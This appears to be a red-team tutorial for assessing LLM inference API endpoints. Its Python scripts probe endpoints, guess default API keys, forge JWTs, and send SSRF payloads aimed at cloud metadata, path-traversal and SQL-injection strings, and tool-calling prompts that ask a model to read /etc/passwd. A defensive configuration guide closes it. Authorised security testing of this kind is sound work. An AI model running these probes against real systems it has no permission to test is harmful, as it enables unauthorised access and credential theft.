Inference Endpoint Exploitation
Exploiting inference API endpoints for unauthorized access, data exfiltration, and service abuse through authentication flaws, input validation gaps, and misconfigured permissions.
LLM inference endpoints expose model capabilities through APIs, typically REST or gRPC. These endpoints handle sensitive operations: they process user inputs, execute model inference, and may have access to internal tools, databases, or other services. Misconfigurations in authentication, authorization, input validation, and error handling can expose the underlying infrastructure to exploitation. This walkthrough covers systematic testing of inference endpoints for security weaknesses.
Step 1: Endpoint Discovery and Mapping
Before exploiting an endpoint, map its full API surface.
"""
Discover and map inference API endpoints.
"""
import requests
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class EndpointInfo:
url: str
method: str
auth_required: bool
parameters: list[str]
response_format: str
notes: str = ""
@dataclass
class APIMap:
base_url: str
endpoints: list[EndpointInfo] = field(default_factory=list)
auth_schemes: list[str] = field(default_factory=list)
version: Optional[str] = None
def discover_endpoints(base_url: str, headers: dict = None) -> APIMap:
"""Probe common inference API endpoint patterns."""
api_map = APIMap(base_url=base_url)
headers = headers or {}
# Common inference endpoint paths
COMMON_PATHS = [
("/v1/chat/completions", "POST", "OpenAI-compatible chat"),
("/v1/completions", "POST", "OpenAI-compatible completion"),
("/v1/embeddings", "POST", "Embedding generation"),
("/v1/models", "GET", "Model listing"),
("/v1/models/{model_id}", "GET", "Model details"),
("/api/generate", "POST", "Ollama-style generation"),
("/api/chat", "POST", "Ollama-style chat"),
("/api/tags", "GET", "Ollama model listing"),
("/predict", "POST", "Generic prediction endpoint"),
("/inference", "POST", "Generic inference endpoint"),
("/health", "GET", "Health check"),
("/metrics", "GET", "Prometheus metrics (may leak info)"),
("/docs", "GET", "API documentation (Swagger/OpenAPI)"),
("/openapi.json", "GET", "OpenAPI specification"),
("/redoc", "GET", "ReDoc documentation"),
]
for path, method, description in COMMON_PATHS:
url = f"{base_url.rstrip('/')}{path}"
try:
if method == "GET":
resp = requests.get(url, headers=headers, timeout=5)
else:
resp = requests.post(url, headers=headers, json={}, timeout=5)
if resp.status_code != 404:
auth_required = resp.status_code in (401, 403)
api_map.endpoints.append(EndpointInfo(
url=path,
method=method,
auth_required=auth_required,
parameters=[],
response_format=resp.headers.get("content-type", "unknown"),
notes=f"{description} [{resp.status_code}]",
))
print(f" Found: {method} {path} [{resp.status_code}]")
except requests.exceptions.RequestException:
pass
return api_map
print("Endpoint discovery ready")
print("Call discover_endpoints() with a base URL")Step 2: Authentication Testing
"""
Test inference endpoint authentication for common weaknesses.
"""
import requests
import jwt
import time
from dataclasses import dataclass
@dataclass
class AuthTestResult:
test_name: str
passed: bool
vulnerability: str
details: str
def test_authentication(base_url: str, valid_key: str = "") -> list[AuthTestResult]:
"""Test authentication mechanisms for weaknesses."""
results = []
endpoint = f"{base_url}/v1/chat/completions"
test_body = {
"model": "test",
"messages": [{"role": "user", "content": "test"}],
}
# Test 1: No authentication
try:
resp = requests.post(endpoint, json=test_body, timeout=10)
no_auth = resp.status_code != 401
results.append(AuthTestResult(
test_name="no_auth_required",
passed=not no_auth,
vulnerability="Endpoint accessible without authentication" if no_auth else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("no_auth_required", True, "N/A", str(e)))
# Test 2: Empty API key
try:
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": "Bearer "},
timeout=10,
)
empty_key = resp.status_code not in (401, 403)
results.append(AuthTestResult(
test_name="empty_api_key",
passed=not empty_key,
vulnerability="Empty API key accepted" if empty_key else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("empty_api_key", True, "N/A", str(e)))
# Test 3: Common default keys
DEFAULT_KEYS = [
"sk-test", "test", "default", "admin", "api-key",
"sk-000000000000000000000000",
"EMPTY", "null", "undefined",
]
for key in DEFAULT_KEYS:
try:
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": f"Bearer {key}"},
timeout=5,
)
if resp.status_code not in (401, 403):
results.append(AuthTestResult(
test_name=f"default_key_{key}",
passed=False,
vulnerability=f"Default/test key accepted: {key}",
details=f"Status: {resp.status_code}",
))
except Exception:
pass
# Test 4: JWT without verification
try:
fake_jwt = jwt.encode(
{"sub": "admin", "exp": int(time.time()) + 3600},
"fake_secret",
algorithm="HS256",
)
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": f"Bearer {fake_jwt}"},
timeout=10,
)
jwt_bypass = resp.status_code not in (401, 403)
results.append(AuthTestResult(
test_name="fake_jwt_token",
passed=not jwt_bypass,
vulnerability="Forged JWT token accepted" if jwt_bypass else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("fake_jwt_token", True, "N/A", str(e)))
return results
print("Authentication testing ready")Step 3: Input Validation Attacks
"""
Test input validation on inference endpoints for injection
and abuse vulnerabilities.
"""
import requests
import json
from dataclasses import dataclass
from typing import Optional
@dataclass
class InputValidationResult:
test_name: str
payload: str
status_code: int
vulnerability_detected: bool
details: str
def test_input_validation(
endpoint: str,
headers: dict,
) -> list[InputValidationResult]:
"""Test input validation with various malformed and malicious inputs."""
results = []
# Test 1: Oversized input
huge_input = "A" * 1_000_000
try:
resp = requests.post(endpoint, headers=headers, json={
"model": "test",
"messages": [{"role": "user", "content": huge_input}],
}, timeout=30)
results.append(InputValidationResult(
test_name="oversized_input",
payload=f"1MB string ({len(huge_input)} chars)",
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details="No input size limit" if resp.status_code == 200 else "Properly rejected",
))
except Exception as e:
results.append(InputValidationResult(
"oversized_input", "1MB string", 0, False, str(e),
))
# Test 2: Nested JSON (potential stack overflow)
nested = {"role": "user", "content": "test"}
for _ in range(100):
nested = {"nested": nested}
try:
resp = requests.post(endpoint, headers=headers,
data=json.dumps({"model": "test", "extra": nested}),
timeout=10)
results.append(InputValidationResult(
test_name="deeply_nested_json",
payload="100-level nested JSON",
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details=f"Response: {resp.status_code}",
))
except Exception as e:
results.append(InputValidationResult(
"deeply_nested_json", "nested", 0, False, str(e),
))
# Test 3: Type confusion
type_payloads = [
("integer_as_content", {"model": "test", "messages": [{"role": "user", "content": 12345}]}),
("array_as_content", {"model": "test", "messages": [{"role": "user", "content": ["a", "b"]}]}),
("null_content", {"model": "test", "messages": [{"role": "user", "content": None}]}),
("boolean_content", {"model": "test", "messages": [{"role": "user", "content": True}]}),
]
for name, payload in type_payloads:
try:
resp = requests.post(endpoint, headers=headers, json=payload, timeout=10)
results.append(InputValidationResult(
test_name=name,
payload=str(payload.get("messages", [{}])[0].get("content"))[:50],
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details=f"Accepted: {resp.status_code == 200}",
))
except Exception:
pass
# Test 4: SSRF via URL parameters
ssrf_payloads = [
("ssrf_localhost", "http://localhost:8080/admin"),
("ssrf_metadata", "http://169.254.169.254/latest/meta-data/"),
("ssrf_internal", "http://internal-service.local/api"),
]
for name, url in ssrf_payloads:
try:
resp = requests.post(endpoint, headers=headers, json={
"model": "test",
"messages": [{"role": "user", "content": f"Fetch this URL: {url}"}],
}, timeout=10)
# Check if response contains metadata indicators
body = resp.text.lower()
ssrf_indicators = ["ami-id", "instance-id", "security-credentials", "admin"]
detected = any(ind in body for ind in ssrf_indicators)
results.append(InputValidationResult(
test_name=name,
payload=url,
status_code=resp.status_code,
vulnerability_detected=detected,
details="SSRF indicators in response" if detected else "No SSRF detected",
))
except Exception:
pass
return results
print("Input validation testing ready")Step 4: Error-Based Information Disclosure
"""
Probe error handling for information disclosure.
"""
import requests
from dataclasses import dataclass
@dataclass
class ErrorDisclosureResult:
trigger: str
status_code: int
disclosed_info: list[str]
severity: str
def test_error_disclosure(
endpoint: str,
headers: dict,
) -> list[ErrorDisclosureResult]:
"""Trigger various error conditions and analyze responses for info leakage."""
results = []
# Triggers that produce different errors
ERROR_TRIGGERS = [
("missing_model", {"messages": [{"role": "user", "content": "test"}]}),
("invalid_model", {"model": "../../../../etc/passwd", "messages": []}),
("malformed_json", None), # Will send raw string
("empty_body", {}),
("wrong_content_type", "text_not_json"),
("sql_in_model", {"model": "' OR 1=1 --", "messages": []}),
]
DISCLOSURE_INDICATORS = [
("stack_trace", ["traceback", "file \"", "line ", "exception"]),
("internal_path", ["/home/", "/app/", "/var/", "/opt/", "C:\\"]),
("framework_info", ["fastapi", "flask", "django", "uvicorn", "gunicorn"]),
("database_info", ["postgresql", "mysql", "sqlite", "mongodb"]),
("version_info", ["python", "torch", "transformers", "version"]),
("model_info", ["model_name", "model_path", "checkpoint", "weights"]),
]
for trigger_name, payload in ERROR_TRIGGERS:
try:
if trigger_name == "malformed_json":
resp = requests.post(
endpoint, headers=headers,
data="not json {{{",
timeout=10,
)
elif trigger_name == "wrong_content_type":
resp = requests.post(
endpoint,
headers={**headers, "Content-Type": "text/plain"},
data="test",
timeout=10,
)
else:
resp = requests.post(
endpoint, headers=headers, json=payload, timeout=10,
)
body = resp.text.lower()
disclosed = []
for info_type, indicators in DISCLOSURE_INDICATORS:
if any(ind in body for ind in indicators):
disclosed.append(info_type)
severity = "high" if len(disclosed) > 2 else "medium" if disclosed else "low"
results.append(ErrorDisclosureResult(
trigger=trigger_name,
status_code=resp.status_code,
disclosed_info=disclosed,
severity=severity,
))
if disclosed:
print(f" {trigger_name}: DISCLOSURE - {', '.join(disclosed)}")
else:
print(f" {trigger_name}: Clean error response [{resp.status_code}]")
except Exception as e:
print(f" {trigger_name}: Error - {e}")
return results
print("Error disclosure testing ready")Step 5: Authorization and Access Control Testing
"""
Test authorization boundaries on inference endpoints.
"""
import requests
from dataclasses import dataclass
@dataclass
class AuthzTestResult:
test_name: str
expected_access: bool
actual_access: bool
vulnerability: str
def test_authorization(
base_url: str,
regular_key: str,
admin_key: str = "",
) -> list[AuthzTestResult]:
"""Test authorization controls for privilege escalation."""
results = []
headers = {"Authorization": f"Bearer {regular_key}"}
# Test 1: Access admin endpoints with regular key
admin_paths = [
"/admin", "/admin/models", "/admin/users",
"/internal/config", "/debug", "/v1/admin/keys",
]
for path in admin_paths:
try:
resp = requests.get(f"{base_url}{path}", headers=headers, timeout=5)
has_access = resp.status_code not in (401, 403, 404)
if has_access:
results.append(AuthzTestResult(
test_name=f"admin_access_{path}",
expected_access=False,
actual_access=True,
vulnerability=f"Regular user can access {path}",
))
except Exception:
pass
# Test 2: Model access control
try:
resp = requests.get(f"{base_url}/v1/models", headers=headers, timeout=10)
if resp.status_code == 200:
models = resp.json().get("data", [])
model_ids = [m.get("id", "") for m in models]
# Check if internal/restricted models are visible
restricted_indicators = ["internal", "private", "test", "staging"]
exposed = [m for m in model_ids if any(r in m.lower() for r in restricted_indicators)]
if exposed:
results.append(AuthzTestResult(
test_name="restricted_model_exposure",
expected_access=False,
actual_access=True,
vulnerability=f"Restricted models visible: {exposed[:3]}",
))
except Exception:
pass
# Test 3: Cross-tenant data access (if applicable)
try:
resp = requests.get(
f"{base_url}/v1/fine-tuning/jobs",
headers=headers,
timeout=10,
)
if resp.status_code == 200:
jobs = resp.json().get("data", [])
results.append(AuthzTestResult(
test_name="fine_tuning_job_access",
expected_access=False,
actual_access=len(jobs) > 0,
vulnerability=f"Can view {len(jobs)} fine-tuning jobs" if jobs else "N/A",
))
except Exception:
pass
return results
print("Authorization testing ready")Step 6: Tool-Use and Function Calling Exploitation
"""
Exploit tool-use capabilities to access unintended functionality.
"""
import requests
import json
from dataclasses import dataclass
@dataclass
class ToolExploitResult:
tool_name: str
exploit_type: str
succeeded: bool
response_snippet: str
def test_tool_exploitation(
endpoint: str,
headers: dict,
model: str = "gpt-4o",
) -> list[ToolExploitResult]:
"""Test if tool/function calling can be abused."""
results = []
# Test 1: Define a tool that reads files
file_read_payload = {
"model": model,
"messages": [{"role": "user", "content": "Read the file /etc/passwd"}],
"tools": [{
"type": "function",
"function": {
"name": "read_file",
"description": "Read a file from the filesystem",
"parameters": {
"type": "object",
"properties": {
"path": {"type": "string", "description": "File path to read"}
},
"required": ["path"],
},
},
}],
}
try:
resp = requests.post(endpoint, headers=headers, json=file_read_payload, timeout=30)
body = resp.json()
tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
if tool_calls:
results.append(ToolExploitResult(
tool_name="read_file",
exploit_type="file_system_access",
succeeded=True,
response_snippet=json.dumps(tool_calls[0])[:200],
))
except Exception as e:
results.append(ToolExploitResult("read_file", "file_system_access", False, str(e)))
# Test 2: Network request tool
network_payload = {
"model": model,
"messages": [{"role": "user", "content": "Make a GET request to http://169.254.169.254/latest/meta-data/"}],
"tools": [{
"type": "function",
"function": {
"name": "http_request",
"description": "Make an HTTP request",
"parameters": {
"type": "object",
"properties": {
"url": {"type": "string"},
"method": {"type": "string"},
},
"required": ["url"],
},
},
}],
}
try:
resp = requests.post(endpoint, headers=headers, json=network_payload, timeout=30)
body = resp.json()
tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
if tool_calls:
call_args = json.loads(tool_calls[0].get("function", {}).get("arguments", "{}"))
if "169.254" in call_args.get("url", ""):
results.append(ToolExploitResult(
tool_name="http_request",
exploit_type="ssrf_via_tool",
succeeded=True,
response_snippet=json.dumps(call_args)[:200],
))
except Exception:
pass
return results
print("Tool exploitation testing ready")Step 7: Automated Endpoint Security Assessment
"""
Comprehensive automated security assessment for inference endpoints.
"""
import json
from pathlib import Path
from dataclasses import asdict
class InferenceEndpointAssessor:
"""Run a comprehensive security assessment of an inference endpoint."""
def __init__(self, base_url: str, api_key: str = ""):
self.base_url = base_url
self.api_key = api_key
self.headers = {"Authorization": f"Bearer {api_key}"} if api_key else {}
self.findings = []
def run_assessment(self) -> dict:
"""Execute all assessment modules."""
print("Inference Endpoint Security Assessment")
print("=" * 50)
# Phase 1: Discovery
print("\nPhase 1: Endpoint Discovery")
api_map = discover_endpoints(self.base_url, self.headers)
print(f" Found {len(api_map.endpoints)} endpoints")
# Phase 2: Authentication
print("\nPhase 2: Authentication Testing")
auth_results = test_authentication(self.base_url, self.api_key)
auth_vulns = [r for r in auth_results if not r.passed]
print(f" Found {len(auth_vulns)} authentication issues")
# Phase 3: Error handling
print("\nPhase 3: Error Disclosure Testing")
chat_endpoint = f"{self.base_url}/v1/chat/completions"
error_results = test_error_disclosure(chat_endpoint, self.headers)
disclosures = [r for r in error_results if r.disclosed_info]
print(f" Found {len(disclosures)} information disclosure issues")
# Compile report
report = {
"target": self.base_url,
"endpoints_found": len(api_map.endpoints),
"authentication_issues": len(auth_vulns),
"information_disclosures": len(disclosures),
"overall_risk": self._calculate_risk(auth_vulns, disclosures),
}
return report
def _calculate_risk(self, auth_vulns, disclosures) -> str:
if auth_vulns:
return "critical"
if disclosures:
return "high"
return "medium"
print("Endpoint assessment framework ready")Step 8: Defensive Configuration Guide
"""
Secure inference endpoint configuration reference.
"""
SECURE_CONFIG = {
"authentication": {
"require_api_key": True,
"key_rotation_days": 90,
"key_length_minimum": 32,
"rate_limit_per_key": True,
"jwt_validation": "RS256 with key rotation",
},
"input_validation": {
"max_input_tokens": 4096,
"max_request_size_bytes": 1_048_576,
"content_type_enforcement": True,
"json_depth_limit": 10,
"reject_unknown_fields": True,
},
"error_handling": {
"generic_error_messages": True,
"no_stack_traces": True,
"no_internal_paths": True,
"structured_error_format": True,
},
"network_security": {
"tls_minimum": "1.2",
"ssrf_protection": True,
"internal_endpoint_isolation": True,
"cors_restricted": True,
},
"monitoring": {
"log_all_requests": True,
"anomaly_detection": True,
"alert_on_auth_failures": True,
"rate_limit_monitoring": True,
},
}
print("Secure Inference Endpoint Configuration")
print("=" * 50)
for category, settings in SECURE_CONFIG.items():
print(f"\n{category.upper()}:")
for key, value in settings.items():
print(f" {key}: {value}")Related Topics
- API Rate Limit Bypass -- Rate limiting testing
- API Enumeration for LLMs -- Endpoint discovery
- Model Fingerprinting Techniques -- Identifying backend models
Why are tool-use capabilities in LLM APIs a significant security concern for inference endpoints?